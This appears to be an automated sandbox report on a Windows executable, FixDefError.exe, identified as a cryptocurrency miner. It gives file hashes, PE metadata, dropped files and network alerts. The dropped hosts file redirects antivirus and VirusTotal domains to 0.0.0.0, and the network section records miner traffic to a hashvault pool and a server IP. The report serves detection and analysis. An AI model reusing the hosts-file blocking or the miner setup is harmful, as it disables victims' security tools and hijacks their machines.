                                                                                                                                                                                                                    SSDEEP:12:wXjXm/Ey6q9995ncdg1miM3qQ10nMCldimE8eawHza1miIo6P:bl68mS1tMLyMCldzE9BHza1tID
                                                                                                                                                                                                                    MD5:E2A96493082A5B2A7C530DF69F5B50AB
                                                                                                                                                                                                                    SHA1:C567BCC50C8C07C1479176ED212B4DB86B742C8E
                                                                                                                                                                                                                    SHA-256:F2DD43F2FE995FAA2514861FE04B6176DE7D556FEF5CCF6C0E44B443599FCA1F
                                                                                                                                                                                                                    SHA-512:847C43303679F99E878D2A7C3E2B34EFC52EBD2C95FBE83A249E1976EFFE983C43D29153E493A6C81FCCA17F136D0BE1B9AB4117D05A7BB674A93B73167B5307
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:....................................................................................4....,.c.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................ee....... .....3h;.2Z..........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.....4....4.c....................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001 (copy)

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                                                    Entropy (8bit):0.11226972425315478
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12:w1jXm/Ey6q9995nu71mK2P3qQ10nMCldimE8eawHza1mKEAP:Fl68c1iPLyMCldzE9BHza15
                                                                                                                                                                                                                    MD5:BFA1B44C4A3CBB0FEB152699F2DC21FB
                                                                                                                                                                                                                    SHA1:71BAF7F8B7783D12ADFEC56A9FA929D3C96EEF6F
                                                                                                                                                                                                                    SHA-256:B1A1A8CDA1F994C157D45AB1A53938267B9BFED4028E07B798CA7163F0F5016E
                                                                                                                                                                                                                    SHA-512:3FF1FFB4C15A895E7C7912AA4FD675A5E1CE9184BE7CE42E53D65405C30B39E134C789E94856CD73C13C45D849A072BB090FCD140D9E5D1E615A52EE1B1C8D07
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:....................................................................................4......c.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................ee....... ......i..2Z..........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.....4......c....................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20230319_071724_277.etl

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):8192
                                                                                                                                                                                                                    Entropy (8bit):3.316154307964996
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:96:DC71Copo+FP53T9ah2YSFCcbSI2lQvkfM4gOT2EYFzjUMC66JRW:W79raw+62y1fCVw
                                                                                                                                                                                                                    MD5:4CF13DC20FD1BCD6838CAC8881A01737
                                                                                                                                                                                                                    SHA1:6B3D0F4953812D697E459925D1AB88315BBDCFF4
                                                                                                                                                                                                                    SHA-256:0BE7297588FB8B312E20BCB27575C40538659A3B96D0DCD3CE4D131D084A1AF6
                                                                                                                                                                                                                    SHA-512:0E6B8E9A88F3D0679F93A484FAEB98083C2A015177E687BDB59DFA33A797213D89FCFFEC3932E08E44FA470081A010162E933055F259EC0BE11C67D9F5836F27
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:.... ... ....................................... ...!...............................P.....g......................B..............Zb... ... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.............................................................WW...... ......Td.2Z..........8.6.9.6.E.A.C.4.-.1.2.8.8.-.4.2.8.8.-.A.4.E.E.-.4.9.E.E.4.3.1.B.0.A.D.9...C.:.\.W.i.n.d.o.w.s.\.S.e.r.v.i.c.e.P.r.o.f.i.l.e.s.\.N.e.t.w.o.r.k.S.e.r.v.i.c.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.D.e.l.i.v.e.r.y.O.p.t.i.m.i.z.a.t.i.o.n.\.L.o.g.s.\.d.o.s.v.c...2.0.2.3.0.3.1.9._.0.7.1.7.2.4._.2.7.7...e.t.l.........P.P.....P.....g.....................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\Windows\System32\drivers\etc\hosts

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                                                                                                                    File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1716
                                                                                                                                                                                                                    Entropy (8bit):4.530975095186605
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:48:vDZhyoZWM9rU5fFcJrWirF481Yws9hCXu5RC:vDZEurK9UrHh481Yws9oXu5RC
                                                                                                                                                                                                                    MD5:461BAE7420051BED72CE164F6F1C498B
                                                                                                                                                                                                                    SHA1:AAD0052A3377DC02FB86E6D9C91E43D7FE1F901F
                                                                                                                                                                                                                    SHA-256:E9EF2F7E0207DA969485B9EA8E973E24F025A52511DFE2C25BE19DC26076F68F
                                                                                                                                                                                                                    SHA-512:ADD15C7424B09CDB52DCB121C99E9C355287F025D438FEA70A366760F6968CE896D285A283683A4948B1602CE3160DA32835805B287916642422E2FD9C39A6B3
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost..0.0.0.0 virustotal.com.0.0.0.0 www.virustotal.com..0.0.0.0 kaspersky.com.0.0.0.0 www.kaspersky.com..0.0.0.0 avast.com.0.0.0.0 www.avast.com..0.0.0.0 av

                                                                                                                                                                                                                    C:\mib.bin

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (484), with CRLF line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):916
                                                                                                                                                                                                                    Entropy (8bit):6.006091656254043
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:24:iyHCgHveQdw0d7YLqwx3DpWiO0cBCcH5y8d+M5:iyiEz77YLqGEiaBJYM
                                                                                                                                                                                                                    MD5:D80CBDF7FBA88ECF7F28F4CD6304B315
                                                                                                                                                                                                                    SHA1:D5AC6E2C716E522E65194289D6A2E381C7E40D4F
                                                                                                                                                                                                                    SHA-256:F4CB8536FB87529314794A5E826930DF121436D04E52F2EEB868CBAFF6E4BE01
                                                                                                                                                                                                                    SHA-512:30A9015929C335A82E85BE067D6624BE68C7B288BF3C0D4A4A6190A1A62D1E3321AFA3943E0EF4B7BF2374374C327E785D806E2D919CA4905D778A6B1192B5CC
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:91Kuym2o0uO1/JlBTKuGYsxlDwJ2KhbLg7HsEo2BQs3wRIgYtyArhVGuksyXMLWdzr4Q+6X5BXNhuPoIAW6EEcKLi4dltHqfZkJ75+yYf8gnQpCiCV5v940icl4TuX6Tvg9kmbSMbhq6z5AUIVj25RFurUUq5bphUJVFS5KIoNB4QTSK1c1nDqg=..0WYkiYGW5Edi+bvRlMTlg+9tKzAf6jFXVuenq9wOhLZqcmOBpKkBojF/Dgg2JARga43C4vNTSf5p8b+RhJHOH7dvj21cEblamTWQP4PeTAo7zTUycNhOsy6ie6HLzP1yS7HYD2m+i7kVIzhOUeEgjnsjQiUpT2/DLOgRDkFEQJr1AmjCOsIwh1+QoPo0dj93eog9eKccnPkwNCSgTuqo7emoyvIeKyO8mJkhCPpjpAlxMlIyU6NENUqTyeKlUb1IOElYGYfcNZxMKDDoQ0Lx7Ft1A0u6QqkQCVin0QkaUsFxvb7DEDcyFPsXQaUB4KCAKBsrBcVAsXSjOew7YJh1LavFo9vAzebVDGwWyCKVMRcym0AmZFznpN84upYfOxnFVQYldwSf1OCxr+NWnmz032Ht98zrhDMBubZHTARjjP5LSZLiVk7M5f/kltzQaHYhzbzbGUhJZlZ7SzGriJiGi/rgnUQdeKGOHQ==..KyDTvW5GhLdanpKLz21nhq5NL+Rc0RCZwkL4YQ8lbbvGt3Y0EesDT13+bgpfkEEC+fod0jDQUy/oMfMFwROck7ZLTHjPFCisZC7PtCbO0GaZw4M67/eC2YJkmwbGuJReab1bOE/Wmhpy55AcAAKwf+gc3i5Q4x5abIp+ioFlrd7SrFrC1lwXaNlJHRISaGykUPsppIXd+zRpyCUHpseK/GxMk322Y9a2Ug==..1..171010202..

                                                                                                                                                                                                                    Static File Info

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                    Entropy (8bit):5.7415841018358895
                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                    File name:FixDefError.exe
                                                                                                                                                                                                                    File size:2393088
                                                                                                                                                                                                                    MD5:1b664f2a0bede6c47e44ca8c0aad3de7
                                                                                                                                                                                                                    SHA1:2dc3169220411d03be438047a3c33696b4371d2b
                                                                                                                                                                                                                    SHA256:908641c2c756b0a2762e4883f7defb050e1baa09d44be8cdad34c5aa562d65d9
                                                                                                                                                                                                                    SHA512:f22f43e7609cbf97b5436e8185f146099ab2706f76ea0dffd3bbac20c4c940e1eda560b84ea457307ace8951234de51a3925f67fd6c47cf0917d491fded105e9
                                                                                                                                                                                                                    SSDEEP:24576:d6XFr/AUXPhtHbLLGpMamGEhP+boT/JsGz1UdbA4ZWIWId4gIehzsBgxUsHB:docUPht7XGpMjTPd/J7y5Bd/nv/
                                                                                                                                                                                                                    TLSH:4EB5BF2439FA601EB173EF668BE478E6DA6FB7733B07645A1051038A4723981DEC153E
                                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....n............"...0..x$...........$.. ....$...@.. ........................$...........`................................

                                                                                                                                                                                                                    File Icon

                                                                                                                                                                                                                    Icon Hash:00828e8e8686b000

                                                                                                                                                                                                                    Static PE Info

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Entrypoint:0x6497ce
                                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                    Time Stamp:0xDBB16EC1 [Sat Oct 19 04:02:09 2086 UTC]
                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                    OS Version Major:4
                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                    File Version Major:4
                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                    jmp dword ptr [00402000h]
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al

                                                                                                                                                                                                                    Data Directories

                                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x24977c0x4f.text
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x6c2.rsrc
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x24c0000xc.reloc
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x2497300x1c.text
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                    Sections

                                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                    .text0x20000x2477d40x247800unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                    .rsrc0x24a0000x6c20x800False0.359375data3.7216609270407237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                    .reloc0x24c0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                    Resources

                                                                                                                                                                                                                    NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                                    RT_VERSION0x24a0a00x438data
                                                                                                                                                                                                                    RT_MANIFEST0x24a4d80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                                                                                                                                                                                                                    Imports

                                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                                    mscoree.dll_CorExeMain

                                                                                                                                                                                                                    Network Behavior

                                                                                                                                                                                                                    Snort IDS Alerts

                                                                                                                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                    192.168.2.38.8.8.849977532036289 03/19/23-00:18:14.932574UDP2036289ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro)4997753192.168.2.38.8.8.8
                                                                                                                                                                                                                    192.168.2.395.179.241.203496974432831812 03/19/23-00:18:15.028582TCP2831812ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-16 8)49697443192.168.2.395.179.241.203
                                                                                                                                                                                                                    192.168.2.395.179.241.203496964432831812 03/19/23-00:18:02.289189TCP2831812ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-16 8)49696443192.168.2.395.179.241.203
                                                                                                                                                                                                                    192.168.2.38.8.8.862704532036289 03/19/23-00:18:02.189431UDP2036289ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro)6270453192.168.2.38.8.8.8

                                                                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                                                                    TCP Packets

                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.409070015 CET4968480192.168.2.3142.251.209.36
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.430979013 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.431353092 CET4968480192.168.2.3142.251.209.36
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.440994024 CET4968480192.168.2.3142.251.209.36
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.462990046 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.521131992 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.521212101 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.521285057 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.521346092 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.521374941 CET4968480192.168.2.3142.251.209.36
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.521408081 CET4968480192.168.2.3142.251.209.36
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.521408081 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.521469116 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.521528959 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.521588087 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.521589041 CET4968480192.168.2.3142.251.209.36
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.521645069 CET4968480192.168.2.3142.251.209.36
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.521647930 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.521711111 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.521770000 CET4968480192.168.2.3142.251.209.36
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.543534994 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.543621063 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.543756008 CET4968480192.168.2.3142.251.209.36
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.544174910 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.544246912 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.545268059 CET4968480192.168.2.3142.251.209.36
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.545730114 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.545789957 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.547324896 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.547405958 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.547442913 CET4968480192.168.2.3142.251.209.36
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.547493935 CET4968480192.168.2.3142.251.209.36
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.548921108 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.548985004 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.549072027 CET4968480192.168.2.3142.251.209.36
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.550436020 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.550498962 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.550740004 CET4968480192.168.2.3142.251.209.36
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.552064896 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.552129030 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.552242041 CET4968480192.168.2.3142.251.209.36
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.553538084 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.553601980 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.555124998 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.555186987 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.555222034 CET4968480192.168.2.3142.251.209.36
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.555248022 CET4968480192.168.2.3142.251.209.36
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.556705952 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.556771040 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.557624102 CET4968480192.168.2.3142.251.209.36
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.565504074 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.565566063 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.565655947 CET4968480192.168.2.3142.251.209.36
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.566277981 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.566339016 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.566421032 CET4968480192.168.2.3142.251.209.36
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.567838907 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.568615913 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.568675995 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.568686962 CET4968480192.168.2.3142.251.209.36
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.570116997 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.570177078 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.570257902 CET4968480192.168.2.3142.251.209.36
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.571569920 CET8049684142.251.209.36192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.571667910 CET4968480192.168.2.3142.251.209.36
